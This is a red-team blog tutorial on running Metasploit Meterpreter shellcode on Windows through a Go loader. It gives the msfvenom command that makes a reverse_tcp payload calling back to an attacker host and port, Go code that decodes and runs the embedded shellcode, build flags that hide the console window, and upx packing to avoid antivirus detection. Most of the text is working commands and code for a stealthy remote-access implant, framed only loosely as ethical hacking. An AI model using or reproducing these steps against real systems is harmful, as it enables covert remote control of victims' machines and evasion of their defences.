Select Page

How To Run Shellcode With Go

by | Feb 20, 2021 | Go, Redteam

photo of turned on laptop computer

Go can be used by ethical hackers to run shellcode generated by Metasploit. That means you can use msfvenom to create shellcode that can be used by a go program to execute it. For this tutorial, I am using this project go-shellcode by brimstone on Github.

First make sure your root user on Kali can run the go binary.

As root try to run the go binary. If it fails then you should probably add export PATH=$PATH:/usr/local/go/bin to /etc/profile followed by a source /etc/profile

Now generate the shellcode using msfvenom and compile the program. Use the program brimstone made on his repo. I build the program using the command: GOOS=windows GOARCH=amd64 go build -ldflags="-s -w -H=windowsgui" main.go.

You need to run the compile command from here: root@kali:/home/kali/go/pkg/mod/github.com/brimstone/[email protected]/cmd/sc# GOOS=windows GOARCH=amd64 go build -ldflags=”-s -w -H=windowsgui” main.go .

Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.


Generate Meterpreter Shellcode

Now use this to generate the shellcode: msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o revshell.hex LHOST=10.0.0.197 LPORT=4444 and pass this to scme.exe. That pops open a fresh Meterpreter shell.

Notice how the meterpreter shellcode is for the x64 arch, this is a requirement. The most reliable way to do this is to pass the hexcode to the compiled go program on the target. Not the stealthiest way to do it, but it demonstrates that it is possible. Use the command: scme.exe {hexcode} to run the shellcode.

Option #2: Run Shellcode As A Variable

Option #2 is to keep the code all on Kali Linux. That means you embed the shellcode in the go program as opposed to feeding it to the compiled program from the first option. You have to make some modifications to the code in order to make it work this way.

package main

import (
        "encoding/hex"
        "fmt"

        shellcode "github.com/brimstone/go-shellcode"
)


func main() {

        sc := "HEX SHELLCODE {msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o revshell.hex LHOST=10.0.0.197 LPORT=4444}"

        scBin, err := hex.DecodeString(sc)
        if err != nil {
           fmt.Println("exiting!")
        }

        shellcode.Run(scBin)
}

This will work to open a new Meterpreter session as well, but it is not stable and will die shortly after.

Antivirus Evasion

You can use upx to pack the program to attempt to avoid antivirus detection. Try packing it with upx, this reduces the file size to around 500 KB.

That’s all there is to it.

error: